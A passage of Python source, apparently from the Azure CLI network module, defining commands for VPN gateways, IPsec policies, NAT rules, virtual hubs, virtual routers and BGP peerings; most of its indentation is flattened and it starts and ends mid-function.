gateway_default_site=None, custom_routes=None, aad_tenant=None, aad_audience=None,
aad_issuer=None, root_cert_data=None, root_cert_name=None, vpn_auth_type=None):
(AddressSpace, SubResource, VirtualNetworkGatewayIPConfiguration, VpnClientConfiguration,
VpnClientRootCertificate) = cmd.get_models('AddressSpace', 'SubResource', 'VirtualNetworkGatewayIPConfiguration',
'VpnClientConfiguration', 'VpnClientRootCertificate')
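    # create the point-to-site client configuration lazily when any related option is supplied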
if any((address_prefixes, radius_server, radius_secret, client_protocol)) and not instance.vpn_client_configuration:
instance.vpn_client_configuration = VpnClientConfiguration()
if address_prefixes is not None:
if not instance.vpn_client_configuration.vpn_client_address_pool:
instance.vpn_client_configuration.vpn_client_address_pool = AddressSpace()
if not instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes:
instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes = []
instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes = address_prefixes
with cmd.update_context(instance.vpn_client_configuration) as c:
c.set_param('vpn_client_protocols', client_protocol)
c.set_param('radius_server_address', radius_server)
c.set_param('radius_server_secret', radius_secret)
if cmd.supported_api_version(min_api='2020-11-01'):
c.set_param('aad_tenant', aad_tenant)
c.set_param('aad_audience', aad_audience)
c.set_param('aad_issuer', aad_issuer)
c.set_param('vpn_authentication_types', vpn_auth_type)
if root_cert_data and cmd.supported_api_version(min_api='2020-11-01'):
upsert_to_collection(instance.vpn_client_configuration, 'vpn_client_root_certificates',
VpnClientRootCertificate(name=root_cert_name, public_cert_data=root_cert_data), 'name')
with cmd.update_context(instance.sku) as c:
c.set_param('name', sku)
c.set_param('tier', sku)
with cmd.update_context(instance) as c:
c.set_param('gateway_default_site', SubResource(id=gateway_default_site) if gateway_default_site else None)
c.set_param('vpn_type', vpn_type)
c.set_param('tags', tags)
subnet_id = '{}/subnets/GatewaySubnet'.format(virtual_network) if virtual_network else \
instance.ip_configurations[0].subnet.id
if virtual_network is not None:
for config in instance.ip_configurations:
config.subnet.id = subnet_id
if public_ip_address is not None:
instance.ip_configurations = []
for i, public_ip in enumerate(public_ip_address):
ip_configuration = VirtualNetworkGatewayIPConfiguration(
subnet=SubResource(id=subnet_id),
public_ip_address=SubResource(id=public_ip),
private_ip_allocation_method='Dynamic', name='vnetGatewayConfig{}'.format(i))
instance.ip_configurations.append(ip_configuration)
# Update active-active/active-standby status
active = len(public_ip_address) == 2
if instance.active and not active:
logger.info('Placing gateway in active-standby mode.')
elif not instance.active and active:
logger.info('Placing gateway in active-active mode.')
instance.active = active
if gateway_type is not None:
instance.gateway_type = gateway_type
if enable_bgp is not None:
instance.enable_bgp = enable_bgp.lower() == 'true'
if custom_routes and cmd.supported_api_version(min_api='2019-02-01'):
if not instance.custom_routes:
instance.custom_routes = AddressSpace()
instance.custom_routes.address_prefixes = custom_routes
_validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight)
return instance
def start_vnet_gateway_package_capture(cmd, client, resource_group_name, virtual_network_gateway_name,
filter_data=None, no_wait=False):
VpnPacketCaptureStartParameters = cmd.get_models('VpnPacketCaptureStartParameters')
parameters = VpnPacketCaptureStartParameters(filter_data=filter_data)
return sdk_no_wait(no_wait, client.begin_start_packet_capture, resource_group_name,
virtual_network_gateway_name, parameters=parameters)
def stop_vnet_gateway_package_capture(cmd, client, resource_group_name, virtual_network_gateway_name,
sas_url, no_wait=False):
VpnPacketCaptureStopParameters = cmd.get_models('VpnPacketCaptureStopParameters')
parameters = VpnPacketCaptureStopParameters(sas_url=sas_url)
return sdk_no_wait(no_wait, client.begin_stop_packet_capture, resource_group_name,
virtual_network_gateway_name, parameters=parameters)
def generate_vpn_client(cmd, client, resource_group_name, virtual_network_gateway_name, processor_architecture=None,
authentication_method=None, radius_server_auth_certificate=None, client_root_certificates=None,
use_legacy=False):
params = cmd.get_models('VpnClientParameters')(
processor_architecture=processor_architecture
)
if cmd.supported_api_version(min_api='2017-06-01') and not use_legacy:
params.authentication_method = authentication_method
params.radius_server_auth_certificate = radius_server_auth_certificate
params.client_root_certificates = client_root_certificates
return client.begin_generate_vpn_profile(resource_group_name, virtual_network_gateway_name, params)
# legacy implementation
return client.begin_generatevpnclientpackage(resource_group_name, virtual_network_gateway_name, params)
def set_vpn_client_ipsec_policy(cmd, client, resource_group_name, virtual_network_gateway_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
VpnClientIPsecParameters = cmd.get_models('VpnClientIPsecParameters')
vpnclient_ipsec_params = VpnClientIPsecParameters(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
return sdk_no_wait(no_wait, client.begin_set_vpnclient_ipsec_parameters, resource_group_name,
virtual_network_gateway_name, vpnclient_ipsec_params)
def disconnect_vnet_gateway_vpn_connections(cmd, client, resource_group_name, virtual_network_gateway_name,
vpn_connection_ids, no_wait=False):
P2SVpnConnectionRequest = cmd.get_models('P2SVpnConnectionRequest')
request = P2SVpnConnectionRequest(vpn_connection_ids=vpn_connection_ids)
return sdk_no_wait(no_wait, client.begin_disconnect_virtual_network_gateway_vpn_connections,
resource_group_name, virtual_network_gateway_name, request)
# endregion
# region VirtualNetworkGatewayConnections
# pylint: disable=too-many-locals
def create_vpn_connection(cmd, resource_group_name, connection_name, vnet_gateway1,
location=None, tags=None, no_wait=False, validate=False,
vnet_gateway2=None, express_route_circuit2=None, local_gateway2=None,
authorization_key=None, enable_bgp=False, routing_weight=10,
connection_type=None, shared_key=None,
use_policy_based_traffic_selectors=False,
express_route_gateway_bypass=None, ingress_nat_rule=None, egress_nat_rule=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import build_vpn_connection_resource
client = network_client_factory(cmd.cli_ctx).virtual_network_gateway_connections
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
tags = tags or {}
# Build up the ARM template
master_template = ArmTemplateBuilder()
vpn_connection_resource = build_vpn_connection_resource(
cmd, connection_name, location, tags, vnet_gateway1,
vnet_gateway2 or local_gateway2 or express_route_circuit2,
connection_type, authorization_key, enable_bgp, routing_weight, shared_key,
use_policy_based_traffic_selectors, express_route_gateway_bypass, ingress_nat_rule, egress_nat_rule)
master_template.add_resource(vpn_connection_resource)
master_template.add_output('resource', connection_name, output_type='object')
if shared_key:
master_template.add_secure_parameter('sharedKey', shared_key)
if authorization_key:
master_template.add_secure_parameter('authorizationKey', authorization_key)
template = master_template.build()
parameters = master_template.build_parameters()
# deploy ARM template
deployment_name = 'vpn_connection_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def update_vpn_connection(cmd, instance, routing_weight=None, shared_key=None, tags=None,
enable_bgp=None, use_policy_based_traffic_selectors=None,
express_route_gateway_bypass=None):
with cmd.update_context(instance) as c:
c.set_param('routing_weight', routing_weight)
c.set_param('shared_key', shared_key)
c.set_param('tags', tags)
c.set_param('enable_bgp', enable_bgp)
c.set_param('express_route_gateway_bypass', express_route_gateway_bypass)
c.set_param('use_policy_based_traffic_selectors', use_policy_based_traffic_selectors)
# TODO: Remove these when issue #1615 is fixed
gateway1_id = parse_resource_id(instance.virtual_network_gateway1.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway1_id['subscription'])
instance.virtual_network_gateway1 = ncf.virtual_network_gateways.get(
gateway1_id['resource_group'], gateway1_id['name'])
if instance.virtual_network_gateway2:
gateway2_id = parse_resource_id(instance.virtual_network_gateway2.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway2_id['subscription'])
instance.virtual_network_gateway2 = ncf.virtual_network_gateways.get(
gateway2_id['resource_group'], gateway2_id['name'])
if instance.local_network_gateway2:
gateway2_id = parse_resource_id(instance.local_network_gateway2.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway2_id['subscription'])
instance.local_network_gateway2 = ncf.local_network_gateways.get(
gateway2_id['resource_group'], gateway2_id['name'])
return instance
def list_vpn_connections(cmd, resource_group_name, virtual_network_gateway_name=None):
if virtual_network_gateway_name:
client = network_client_factory(cmd.cli_ctx).virtual_network_gateways
return client.list_connections(resource_group_name, virtual_network_gateway_name)
client = network_client_factory(cmd.cli_ctx).virtual_network_gateway_connections
return client.list(resource_group_name)
def start_vpn_conn_package_capture(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
filter_data=None, no_wait=False):
VpnPacketCaptureStartParameters = cmd.get_models('VpnPacketCaptureStartParameters')
parameters = VpnPacketCaptureStartParameters(filter_data=filter_data)
return sdk_no_wait(no_wait, client.begin_start_packet_capture, resource_group_name,
virtual_network_gateway_connection_name, parameters=parameters)
def stop_vpn_conn_package_capture(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
sas_url, no_wait=False):
VpnPacketCaptureStopParameters = cmd.get_models('VpnPacketCaptureStopParameters')
parameters = VpnPacketCaptureStopParameters(sas_url=sas_url)
return sdk_no_wait(no_wait, client.begin_stop_packet_capture, resource_group_name,
virtual_network_gateway_connection_name, parameters=parameters)
def show_vpn_connection_device_config_script(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
vendor, device_family, firmware_version):
VpnDeviceScriptParameters = cmd.get_models('VpnDeviceScriptParameters')
parameters = VpnDeviceScriptParameters(
vendor=vendor,
device_family=device_family,
firmware_version=firmware_version
)
return client.vpn_device_configuration_script(resource_group_name, virtual_network_gateway_connection_name,
parameters=parameters)
# endregion
# region IPSec Policy Commands
def add_vnet_gateway_ipsec_policy(cmd, resource_group_name, gateway_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
IpsecPolicy = cmd.get_models('IpsecPolicy')
new_policy = IpsecPolicy(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
try:
if gateway.vpn_client_configuration.vpn_client_ipsec_policies:
gateway.vpn_client_configuration.vpn_client_ipsec_policies.append(new_policy)
else:
gateway.vpn_client_configuration.vpn_client_ipsec_policies = [new_policy]
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def clear_vnet_gateway_ipsec_policies(cmd, resource_group_name, gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
try:
gateway.vpn_client_configuration.vpn_client_ipsec_policies = None
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
from azure.cli.core.commands import LongRunningOperation
poller = sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
return LongRunningOperation(cmd.cli_ctx)(poller).vpn_client_configuration.vpn_client_ipsec_policies
def list_vnet_gateway_ipsec_policies(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
try:
return ncf.get(resource_group_name, gateway_name).vpn_client_configuration.vpn_client_ipsec_policies
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
def add_vpn_conn_ipsec_policy(cmd, client, resource_group_name, connection_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
IpsecPolicy = cmd.get_models('IpsecPolicy')
new_policy = IpsecPolicy(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
conn = client.get(resource_group_name, connection_name)
if conn.ipsec_policies:
conn.ipsec_policies.append(new_policy)
else:
conn.ipsec_policies = [new_policy]
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
def clear_vpn_conn_ipsec_policies(cmd, client, resource_group_name, connection_name, no_wait=False):
conn = client.get(resource_group_name, connection_name)
conn.ipsec_policies = None
conn.use_policy_based_traffic_selectors = False
if no_wait:
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
from azure.cli.core.commands import LongRunningOperation
poller = sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
return LongRunningOperation(cmd.cli_ctx)(poller).ipsec_policies
def list_vpn_conn_ipsec_policies(cmd, client, resource_group_name, connection_name):
return client.get(resource_group_name, connection_name).ipsec_policies
def assign_vnet_gateway_aad(cmd, resource_group_name, gateway_name,
aad_tenant, aad_audience, aad_issuer, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
gateway.vpn_client_configuration.aad_tenant = aad_tenant
gateway.vpn_client_configuration.aad_audience = aad_audience
gateway.vpn_client_configuration.aad_issuer = aad_issuer
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def show_vnet_gateway_aad(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
return gateway.vpn_client_configuration
def remove_vnet_gateway_aad(cmd, resource_group_name, gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
gateway.vpn_client_configuration.aad_tenant = None
gateway.vpn_client_configuration.aad_audience = None
gateway.vpn_client_configuration.aad_issuer = None
if cmd.supported_api_version(min_api='2020-11-01'):
gateway.vpn_client_configuration.vpn_authentication_types = None
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def add_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name, name, internal_mappings, external_mappings,
rule_type=None, mode=None, ip_config_id=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
VirtualNetworkGatewayNatRule, VpnNatRuleMapping = cmd.get_models('VirtualNetworkGatewayNatRule',
'VpnNatRuleMapping')
gateway.nat_rules.append(
VirtualNetworkGatewayNatRule(type_properties_type=rule_type, mode=mode, name=name,
internal_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in internal_mappings] if internal_mappings else None,
external_mappings=[VpnNatRuleMapping(address_space=e_map) for e_map in external_mappings] if external_mappings else None,
ip_configuration_id=ip_config_id))
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def show_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
return gateway.nat_rules
def remove_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name, name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
for rule in gateway.nat_rules:
if name == rule.name:
gateway.nat_rules.remove(rule)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
    raise UnrecognizedArgumentError(f'NAT rule named "{name}" was not found.')
# endregion
# region VirtualHub
def create_virtual_hub(cmd, client,
resource_group_name,
virtual_hub_name,
hosted_subnet,
public_ip_address=None,
location=None,
tags=None):
from azure.core.exceptions import HttpResponseError
from azure.cli.core.commands import LongRunningOperation
try:
client.get(resource_group_name, virtual_hub_name)
        raise CLIError('The VirtualHub "{}" under resource group "{}" already exists'.format(
            virtual_hub_name, resource_group_name))
except HttpResponseError:
pass
SubResource = cmd.get_models('SubResource')
VirtualHub, HubIpConfiguration = cmd.get_models('VirtualHub', 'HubIpConfiguration')
hub = VirtualHub(tags=tags, location=location,
virtual_wan=None,
sku='Standard')
vhub_poller = client.begin_create_or_update(resource_group_name, virtual_hub_name, hub)
LongRunningOperation(cmd.cli_ctx)(vhub_poller)
ip_config = HubIpConfiguration(
subnet=SubResource(id=hosted_subnet),
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
)
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
try:
vhub_ip_poller = vhub_ip_config_client.begin_create_or_update(
resource_group_name, virtual_hub_name, 'Default', ip_config)
LongRunningOperation(cmd.cli_ctx)(vhub_ip_poller)
except Exception as ex:
logger.error(ex)
try:
vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
except HttpResponseError:
pass
client.begin_delete(resource_group_name, virtual_hub_name)
raise ex
return client.get(resource_group_name, virtual_hub_name)
def virtual_hub_update_setter(client, resource_group_name, virtual_hub_name, parameters):
return client.begin_create_or_update(resource_group_name, virtual_hub_name, parameters)
def update_virtual_hub(cmd, instance,
tags=None,
allow_branch_to_branch_traffic=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
c.set_param('allow_branch_to_branch_traffic', allow_branch_to_branch_traffic)
return instance
def delete_virtual_hub(cmd, client, resource_group_name, virtual_hub_name, no_wait=False):
from azure.cli.core.commands import LongRunningOperation
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
ip_configs = list(vhub_ip_config_client.list(resource_group_name, virtual_hub_name))
if ip_configs:
ip_config = ip_configs[0] # There will always be only 1
poller = vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, ip_config.name)
LongRunningOperation(cmd.cli_ctx)(poller)
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, virtual_hub_name)
def list_virtual_hub(client, resource_group_name=None):
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name)
return client.list()
def create_virtual_hub_bgp_connection(cmd, client, resource_group_name, virtual_hub_name, connection_name,
peer_asn, peer_ip, no_wait=False):
BgpConnection = cmd.get_models('BgpConnection')
vhub_bgp_conn = BgpConnection(name=connection_name, peer_asn=peer_asn, peer_ip=peer_ip)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name,
virtual_hub_name, connection_name, vhub_bgp_conn)
def virtual_hub_bgp_connection_update_setter(client, resource_group_name,
virtual_hub_name, connection_name,
parameters):
return client.begin_create_or_update(resource_group_name, virtual_hub_name, connection_name, parameters)
def update_virtual_hub_bgp_connection(cmd, instance, peer_asn=None, peer_ip=None):
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('peer_ip', peer_ip)
return instance
def delete_virtual_hub_bgp_connection(client, resource_group_name,
virtual_hub_name, connection_name, no_wait=False):
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, virtual_hub_name, connection_name)
def list_virtual_hub_bgp_connection_learned_routes(client, resource_group_name, virtual_hub_name, connection_name):
return client.begin_list_learned_routes(resource_group_name, virtual_hub_name, connection_name)
def list_virtual_hub_bgp_connection_advertised_routes(client, resource_group_name, virtual_hub_name, connection_name):
return client.begin_list_advertised_routes(resource_group_name, virtual_hub_name, connection_name)
# endregion
# region VirtualRouter
def create_virtual_router(cmd,
resource_group_name,
virtual_router_name,
hosted_gateway=None,
hosted_subnet=None,
location=None,
tags=None):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
from azure.core.exceptions import HttpResponseError
try:
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
virtual_hub_name = virtual_router_name
try:
vhub_client.get(resource_group_name, virtual_hub_name)
        raise CLIError('The VirtualRouter "{}" under resource group "{}" already exists'.format(
            virtual_hub_name, resource_group_name))
except HttpResponseError:
pass
SubResource = cmd.get_models('SubResource')
# for old VirtualRouter
if hosted_gateway is not None:
VirtualRouter = cmd.get_models('VirtualRouter')
virtual_router = VirtualRouter(virtual_router_asn=None,
virtual_router_ips=[],
hosted_subnet=None,
hosted_gateway=SubResource(id=hosted_gateway),
location=location,
tags=tags)
return vrouter_client.begin_create_or_update(resource_group_name, virtual_router_name, virtual_router)
# for VirtualHub
VirtualHub, HubIpConfiguration = cmd.get_models('VirtualHub', 'HubIpConfiguration')
hub = VirtualHub(tags=tags, location=location, virtual_wan=None, sku='Standard')
ip_config = HubIpConfiguration(subnet=SubResource(id=hosted_subnet))
from azure.cli.core.commands import LongRunningOperation
vhub_poller = vhub_client.begin_create_or_update(resource_group_name, virtual_hub_name, hub)
LongRunningOperation(cmd.cli_ctx)(vhub_poller)
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
try:
vhub_ip_poller = vhub_ip_config_client.begin_create_or_update(resource_group_name,
virtual_hub_name,
'Default',
ip_config)
LongRunningOperation(cmd.cli_ctx)(vhub_ip_poller)
except Exception as ex:
logger.error(ex)
vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
vhub_client.begin_delete(resource_group_name, virtual_hub_name)
raise ex
return vhub_client.get(resource_group_name, virtual_hub_name)
def virtual_router_update_getter(cmd, resource_group_name, virtual_router_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
return vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError: # 404
pass
virtual_hub_name = virtual_router_name
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
return vhub_client.get(resource_group_name, virtual_hub_name)
def virtual_router_update_setter(cmd, resource_group_name, virtual_router_name, parameters):
if parameters.type == 'Microsoft.Network/virtualHubs':
client = network_client_factory(cmd.cli_ctx).virtual_hubs
else:
client = network_client_factory(cmd.cli_ctx).virtual_routers
# If the client is virtual_hubs,
# the virtual_router_name represents virtual_hub_name and
# the parameters represents VirtualHub
return client.begin_create_or_update(resource_group_name, virtual_router_name, parameters)
def update_virtual_router(cmd, instance, tags=None):
# both VirtualHub and VirtualRouter own those properties
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
return instance
def list_virtual_router(cmd, resource_group_name=None):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
if resource_group_name is not None:
vrouters = vrouter_client.list_by_resource_group(resource_group_name)
vhubs = vhub_client.list_by_resource_group(resource_group_name)
else:
vrouters = vrouter_client.list()
vhubs = vhub_client.list()
return list(vrouters) + list(vhubs)
def show_virtual_router(cmd, resource_group_name, virtual_router_name):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
from azure.core.exceptions import HttpResponseError
try:
item = vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
virtual_hub_name = virtual_router_name
item = vhub_client.get(resource_group_name, virtual_hub_name)
return item
def delete_virtual_router(cmd, resource_group_name, virtual_router_name):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
from azure.core.exceptions import HttpResponseError
try:
vrouter_client.get(resource_group_name, virtual_router_name)
item = vrouter_client.begin_delete(resource_group_name, virtual_router_name)
except HttpResponseError:
from azure.cli.core.commands import LongRunningOperation
virtual_hub_name = virtual_router_name
poller = vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
LongRunningOperation(cmd.cli_ctx)(poller)
item = vhub_client.begin_delete(resource_group_name, virtual_hub_name)
return item
def create_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name, peer_asn, peer_ip):
# try VirtualRouter first
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
VirtualRouterPeering = cmd.get_models('VirtualRouterPeering')
virtual_router_peering = VirtualRouterPeering(peer_asn=peer_asn, peer_ip=peer_ip)
return vrouter_peering_client.begin_create_or_update(resource_group_name,
virtual_router_name,
peering_name,
virtual_router_peering)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# try VirtualHub then if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
BgpConnection = cmd.get_models('BgpConnection')
vhub_bgp_conn = BgpConnection(name=peering_name, peer_asn=peer_asn, peer_ip=peer_ip)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.begin_create_or_update(resource_group_name, virtual_hub_name,
bgp_conn_name, vhub_bgp_conn)
def virtual_router_peering_update_getter(cmd, resource_group_name, virtual_router_name, peering_name):
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
from azure.core.exceptions import HttpResponseError
try:
return vrouter_peering_client.get(resource_group_name, virtual_router_name, peering_name)
except HttpResponseError: # 404
pass
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.get(resource_group_name, virtual_hub_name, bgp_conn_name)
def virtual_router_peering_update_setter(cmd, resource_group_name, virtual_router_name, peering_name, parameters):
if parameters.type == 'Microsoft.Network/virtualHubs/bgpConnections':
client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
else:
client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
# if the client is virtual_hub_bgp_connection,
# the virtual_router_name represents virtual_hub_name and
# the peering_name represents bgp_connection_name and
# the parameters represents BgpConnection
return client.begin_create_or_update(resource_group_name, virtual_router_name, peering_name, parameters)
def update_virtual_router_peering(cmd, instance, peer_asn=None, peer_ip=None):
# both VirtualHub and VirtualRouter own those properties
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('peer_ip', peer_ip)
return instance
def list_virtual_router_peering(cmd, resource_group_name, virtual_router_name):
virtual_hub_name = virtual_router_name
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
try:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
vrouter_peerings = list(vrouter_peering_client.list(resource_group_name, virtual_router_name))
except HttpResponseError:
vrouter_peerings = []
virtual_hub_name = virtual_router_name
try:
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connections
vhub_bgp_connections = list(vhub_bgp_conn_client.list(resource_group_name, virtual_hub_name))
except HttpResponseError:
vhub_bgp_connections = []
return list(vrouter_peerings) + list(vhub_bgp_connections)
def show_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
return vrouter_peering_client.get(resource_group_name, virtual_router_name, peering_name)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# try VirtualHub then if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
